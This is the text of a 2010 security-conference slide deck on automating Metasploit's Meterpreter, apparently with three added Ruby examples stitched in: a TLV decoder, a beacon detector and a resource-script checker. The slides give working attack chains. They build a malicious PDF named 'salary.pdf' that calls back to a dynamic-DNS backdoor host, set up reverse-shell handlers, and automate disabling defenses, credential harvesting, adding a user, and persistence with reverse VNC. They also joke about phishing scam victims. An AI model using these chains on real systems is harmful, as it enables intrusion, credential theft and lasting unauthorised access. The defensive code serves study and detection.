Inside Metasploit Understanding Meterpreter - NoThink · use...
INSIDE METASPLOIT: AUTOMATING METERPRETER
A penetration testing and development platform for creating security tools and exploits.
Used world-wide by network security professionals to perform penetration tests, and by system administrators, product vendors, and security researchers.
Metasploit can be used for both good and evil
http://www.metasploit.com
WHAT IS METASPLOIT?
Install packages available for Linux, BSD, Mac OS X, Cygwin, Windows 2000/XP/2003/Vista
http://www.metasploit.com/framework/download/
Once installed, it is easy to update! In the working directory, type: svn up
hevnsnts-MacBook-Pro:msf3 hevnsnt$ svn up
U external/source/gui/msfguijava/src/msfgui/PayloadPopup.form
U scripts/meterpreter/enum_powershell_env.rb
U scripts/meterpreter/winenum.rb
U scripts/meterpreter/credcollect.rb
..................
A scripts/meterpreter/file_collector.rb
A data/exploits/cve-2010-2883.ttf
Updated to revision 10299.
INSTALLATION – UPDATING
Everything you need to know in one slide
Starting msfconsole
• ./msfconsole
• just keep typing “banner” until you get the cow
Simple Exploitation
• Define [Exploit]
• Define [Payload]
• Define Listener
• show options / advanced
• Exploit
Reflective DLL, doesn’t write anything to disk.
SSL encryption for all modules, TLV commands, session traffic, migration.
Hows and whys: http://pauldotcom.com/2009/07/meterpreter-stealthier-than-ev.html
About Meterpreter
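The slide above lists TLV commands among Meterpreter's traits without showing the framing. The Ruby below is an added example, not part of the slides or of Metasploit itself: it encodes and decodes the length-prefixed TLV layout. The layout and the meta-type flag values are my recollection of the Metasploit source of that era and should be read as assumptions; the type ids and method name in the sample packet are constructed. The point an analyst writing a session decoder needs is in tlv_decode: the length field comes off the wire, so it is checked against the buffer before it is trusted.

```ruby
# Added example (not from the slides or Metasploit): encode and decode the
# length-prefixed TLV framing Meterpreter uses for commands and session data.
# Assumed layout (my recollection of the Metasploit source of this era):
#   4-byte big-endian length (counts the 8-byte header plus the value)
#   4-byte big-endian type   (meta-type flags in the high bits, id in the low)
#   value
# A packet is a flat sequence of such TLVs.

# Meta-type flags (assumed values).
META_STRING = 1 << 16
META_UINT   = 1 << 17
META_BOOL   = 1 << 18
META_RAW    = 1 << 19
HEADER_LEN  = 8

# Encode one TLV; the meta-type flag decides how the value is serialised.
def tlv_encode(type, value)
  body =
    if    (type & META_STRING) != 0 then value.to_s.b + "\x00".b  # NUL-terminated
    elsif (type & META_UINT)   != 0 then [value].pack("N")        # 32-bit big-endian
    elsif (type & META_BOOL)   != 0 then [value ? 1 : 0].pack("C")
    else  value.to_s.b                                            # raw bytes
    end
  [HEADER_LEN + body.bytesize, type].pack("NN") + body
end

# Decode a buffer into [type, value] pairs. The length field comes off the
# wire, so it is validated against the buffer before any slice is taken;
# a truncated or oversized TLV raises instead of reading past the end.
def tlv_decode(buf)
  buf = buf.b
  out = []
  pos = 0
  while pos < buf.bytesize
    raise "truncated header at offset #{pos}" if buf.bytesize - pos < HEADER_LEN
    len, type = buf[pos, HEADER_LEN].unpack("NN")
    raise "bad length #{len} at offset #{pos}" if len < HEADER_LEN || pos + len > buf.bytesize
    raw = buf[pos + HEADER_LEN, len - HEADER_LEN]
    value =
      if    (type & META_STRING) != 0 then raw.chomp("\x00".b)
      elsif (type & META_UINT)   != 0 then raw.unpack1("N")
      elsif (type & META_BOOL)   != 0 then raw.unpack1("C") == 1
      else  raw
      end
    out << [type, value]
    pos += len
  end
  out
end

# Constructed sample packet: the type ids and method name are illustrative,
# not the real Meterpreter command numbers.
TLV_METHOD     = META_STRING | 1
TLV_REQUEST_ID = META_STRING | 2
TLV_FLAG       = META_BOOL   | 3
TLV_PORT       = META_UINT   | 4

def example_packet
  tlv_encode(TLV_METHOD, "example_method") +
    tlv_encode(TLV_REQUEST_ID, "0123456789abcdef") +
    tlv_encode(TLV_FLAG, true) +
    tlv_encode(TLV_PORT, 4444)
end

if __FILE__ == $0
  tlv_decode(example_packet).each { |t, v| printf("type=0x%08x value=%p\n", t, v) }
end
```

Because the session traffic is SSL-wrapped, this framing is only visible once the TLS layer is off (a memory capture or an instrumented endpoint); the decoder is for that analysis step, not for sniffing the wire.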
The Reverse Meterpreter Setup
Listener (LHOST)
Victim (RHOST)
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.9
set LPORT 4444
set ExitOnSession false
exploit -j -z
The Multi/Handler
The Reverse Meterpreter Setup
The “multi/handler” (LHOST)
But we are not going to do it that way
I <3 adobe
use exploit/windows/fileformat/adobe_cooltype_sing
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST backdoor.dyndns.com
set FILENAME salary.pdf
exploit
[*] Creating 'salary.pdf' file...
[*] Generated output file /pentest/msf3/data/exploits/salary.pdf
[*] Exploit completed, but no session was created.
[ still unpatched ]
Why choose Meterpreter?
man meterpreter
• “no manual entry for meterpreter”, so type “?” instead. That’s why.
• Let’s have some Meterpreter fun
• “getuid” & “getpid”
• “ps” to get the process list
• “migrate [process]” into that process
• “getsystem”
• “shell”
• “hashdump”
• “upload”
We own the box, So what should we do?
- disable defenses
- get system passwords
- add a user
- add a backdoor
- get screenshot
Meterpreter Scripts: ./msf3/scripts/meterpreter/
DARKOPERATOR PWNS!
run [scriptname]
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.9
set LPORT 4444
set ExitOnSession false
exploit -j -z
The Multi/Handler
But WAIT!
set AutoRunScript scripts/meterpreter/[script].rb
NEVER FORGET
Automate
# Meterpreter script for running multiple scripts on a Meterpreter Session
# Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
"-rc" Text file with a list of commands, one per line
PUTTING IT ALL TOGETHER…
What did we want it to do?
Let’s automate
- disable defenses
- get system passwords
- add a user
- add a backdoor
- get screenshot
Consider multi.txt:
getcountermeasure -k -d
migrate explorer.exe
credcollect
enum_firefox
enum_putty
getgui -u vmware3889 -p Luuulz
persistence -X -i 30 -p 5465 -r backdoor.dyndns.com
vnc -r backdoor.dyndns.com -D
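The persistence line in multi.txt reconnects to the handler every 30 seconds, and that regularity is exactly what a defender can look for in outbound connection logs. The Ruby below is an added example, not part of the slides or of Metasploit: it groups connection records by source, destination and port and flags flows whose inter-arrival times are nearly constant. The log format, sample lines, IP addresses, thresholds and function names are all constructed for this example.

```ruby
# Added example (not from the slides or Metasploit): a beacon detector for
# the traffic pattern that "persistence -X -i 30 ..." produces. The host
# reconnects to the handler every 30 seconds, so an outbound connection log
# shows the same src -> dst:port at a near-constant interval.
# Log format (constructed for this example):
#   <epoch seconds> <src ip> -> <dst ip>:<dst port>

SAMPLE_LOG = <<~LOG
  1285999200 10.0.0.7 -> 203.0.113.5:5465
  1285999201 10.0.0.7 -> 198.51.100.9:443
  1285999230 10.0.0.7 -> 203.0.113.5:5465
  1285999260 10.0.0.7 -> 203.0.113.5:5465
  1285999262 10.0.0.8 -> 198.51.100.9:443
  1285999291 10.0.0.7 -> 203.0.113.5:5465
  1285999320 10.0.0.7 -> 203.0.113.5:5465
  1285999400 10.0.0.8 -> 198.51.100.9:443
  1285999900 10.0.0.8 -> 198.51.100.9:443
LOG

LINE_RE = /\A(\d+)\s+(\S+)\s+->\s+(\S+):(\d+)\z/

# Group connection timestamps by (src, dst, port); malformed lines are skipped.
def flows_from_log(text)
  flows = Hash.new { |h, k| h[k] = [] }
  text.each_line do |line|
    m = LINE_RE.match(line.strip) or next
    flows[[m[2], m[3], m[4].to_i]] << m[1].to_i
  end
  flows
end

# Flag flows with at least min_hits connections whose inter-arrival times
# have low relative spread (stddev / mean below max_jitter). Returns one
# hash per flagged flow, sorted by mean interval.
def detect_beacons(text, min_hits: 4, max_jitter: 0.2)
  flows_from_log(text).map do |(src, dst, port), times|
    next if times.size < min_hits
    ts = times.sort
    gaps = ts.each_cons(2).map { |a, b| b - a }
    mean = gaps.sum.to_f / gaps.size
    next if mean <= 0
    stddev = Math.sqrt(gaps.map { |g| (g - mean)**2 }.sum / gaps.size)
    next if stddev / mean > max_jitter
    { src: src, dst: dst, port: port, hits: ts.size, mean_interval: mean.round(1) }
  end.compact.sort_by { |f| f[:mean_interval] }
end

if __FILE__ == $0
  detect_beacons(SAMPLE_LOG).each do |f|
    puts "beacon: #{f[:src]} -> #{f[:dst]}:#{f[:port]} every ~#{f[:mean_interval]}s (#{f[:hits]} hits)"
  end
end
```

The handler on the slides is reached through a dynamic DNS name rather than a fixed address, so a destination blocklist is weak on its own; the interval signal survives an address change. Legitimate updaters and monitoring agents also beacon, so tune min_hits and max_jitter to the log source and treat a hit as a lead to investigate rather than a verdict.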
Did you know msfconsole (metasploit) is scriptable?
Consider ListenReady.rc:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.9
set LPORT 4444
set ExitOnSession false
set AutoRunScript multiscript -rc /path/to/multi.txt
exploit -j -z
./msfconsole -r ListenReady.rc
Let’s begin our multi/handler
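Since the handler is driven by a resource script, the script can be checked before msfconsole runs it. The Ruby below is an added example, not from the slides or from Metasploit: it parses ListenReady.rc into commands and settings, reports whether the options the automation depends on are present (ExitOnSession false, AutoRunScript set, exploit backgrounded with -j -z), and derives the listener endpoint. The parser, the check wording and the assumption that msfconsole looks commands up by exact lowercase name are mine; the option names and the file contents come from the slides.

```ruby
# Added example (not from the slides or Metasploit): parse an msfconsole
# resource script and check it has everything the automated handler needs.
# Option names and the file are the slide's; parser and checks are mine.

# The slide's file, reproduced as input.
LISTEN_READY_RC = <<~RC
  use exploit/multi/handler
  set PAYLOAD windows/meterpreter/reverse_tcp
  set LHOST 192.168.1.9
  set LPORT 4444
  set ExitOnSession false
  set AutoRunScript multiscript -rc /path/to/multi.txt
  exploit -j -z
RC

# Split an rc file into [command, argument-string] pairs, dropping blank
# lines and "#" comments.
def parse_rc(text)
  text.each_line.map(&:strip).reject { |l| l.empty? || l.start_with?("#") }.map do |line|
    cmd, rest = line.split(/\s+/, 2)
    [cmd, rest.to_s]
  end
end

# Collect "set NAME VALUE" lines into a hash keyed by option name.
def rc_settings(commands)
  commands.each_with_object({}) do |(cmd, rest), h|
    next unless cmd == "set"
    name, value = rest.split(/\s+/, 2)
    h[name] = value.to_s
  end
end

# Return a list of problems; an empty list means the handler stays up after
# the first session, runs as a background job, and runs the script list
# against every session that arrives.
def handler_problems(text)
  commands = parse_rc(text)
  settings = rc_settings(commands)
  problems = []
  commands.each do |cmd, _|
    # Assumption: msfconsole dispatches on the exact command name, so "Set"
    # is not "set" and would be rejected as an unknown command.
    problems << "command #{cmd.inspect} is not lowercase" if cmd != cmd.downcase
  end
  problems << "no 'use exploit/multi/handler'" unless commands.include?(["use", "exploit/multi/handler"])
  %w[PAYLOAD LHOST LPORT].each { |o| problems << "#{o} not set" unless settings.key?(o) }
  problems << "ExitOnSession should be false" unless settings["ExitOnSession"].to_s.downcase == "false"
  problems << "AutoRunScript not set (NEVER FORGET)" unless settings.key?("AutoRunScript")
  last = commands.last
  problems << "last command should be 'exploit -j -z'" unless last && last[0] == "exploit" && last[1].split.sort == %w[-j -z]
  problems
end

# The address:port the handler will listen on, as configured.
def listener_endpoint(text)
  s = rc_settings(parse_rc(text))
  "#{s['LHOST']}:#{s['LPORT']}"
end

if __FILE__ == $0
  puts "ListenReady.rc: #{handler_problems(LISTEN_READY_RC).empty? ? 'ok' : 'problems'}"
  puts "listener: #{listener_endpoint(LISTEN_READY_RC)}"
  broken = LISTEN_READY_RC.sub("set AutoRunScript", "# set AutoRunScript").sub("set LHOST", "Set LHOST")
  handler_problems(broken).each { |p| puts "  - #{p}" }
end
```

The same settings hash is what a blue team reads off a recovered resource script during an investigation: LHOST and LPORT give the listener the implant was built to call, and AutoRunScript names the script list that ran on every session.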
Search Gmail for “ATM +Nigeria”
And Reply ;)
The Setup
AutoRunScript
The Setup
- disable defenses
- get system passwords
- add a user
- add a backdoor
- get screenshot
15th Ann. October 2nd 2010
QUESTIONS?
Bill Swearingen, CISSP
Twitter: @hevnsnt
email: [email protected]
Slides are available now: http://snipurl.com/bsides917
(VIA PDF OF COURSE)